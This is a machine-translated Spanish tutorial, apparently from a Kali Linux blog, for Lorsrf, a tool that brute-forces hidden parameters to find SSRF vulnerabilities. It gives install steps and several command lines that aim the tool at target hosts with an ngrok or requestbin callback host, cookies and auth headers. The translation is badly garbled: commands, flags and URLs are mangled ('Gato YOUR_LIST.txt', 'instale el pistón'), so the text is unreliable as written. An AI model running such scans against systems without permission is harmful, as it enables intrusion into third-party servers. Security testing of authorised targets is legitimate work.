Tutoriales

Parámetros SSRF Bruteforce !!! Tutoriales de Kali Linux

Lorsrf se ha agregado a scant3r con adiciones útiles (método multi http, tipo de contenido múltiple (json, consulta, xml, velocidad, Worlist grande y más)). Fuerza bruta en parámetros ocultos para encontrar vulnerabilidades SSRF con GET y POST Métodos

Instalar

➜ Clon de Git https://github.com/knassar702/lorsrf
➜ CD Lorsrf
➜ sudo pip3 instale el pistón

Instale la herramienta Ngrok

pasos

Publicaciones relacionadas

falda

  • guía a tu ngrok ./ngrok http 9090
  • Correr server.py Script y agregue el puerto ngrok python3 server.py 9090
  • Correr lorsrf.py y agregue el host ngrok -s oportunidad

requestbin.com

  • Inicie sesión en https://requestbin.com
  • Copie y agregue su host usando -s Opción (sin server.py Expediente)

¿Como puedo usar lo?

Gato YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w lista de palabras.txt

Ejemplos de

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -shttp: //53252.ngrok.io

Agregar hilos

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -threads = 50

Agregar tiempo de espera

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io –Tiempo de espera = 4

Agregar cookies

$ Parámetros de gato.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c ‘usuario = 5 & PHPSESSION = 5232’

Agregar encabezados desde un archivo de texto

PScat headers.txt
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==
$ cat Parameter.txt | python3 lorsrf.py -f headers.txt -s ‘http://myhost.com’ -t ‘http://ssrf.hack.com’
GET /? Parámetro = YOUR_HOST HTTP / 1.1
Alojado por targer.com
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==

El reenvío seguirá

$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http: // 53252.ngrok.io -r

Pruebas

python3 lorsrf.py -t ‘http://testphp.vulnweb.com/showimage.php’ -s ‘https://IHR_HOST.com’ -w parámetros.txt

GIF

LEER  Las 10 mejores distribuciones de juegos de Linux de 2023

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba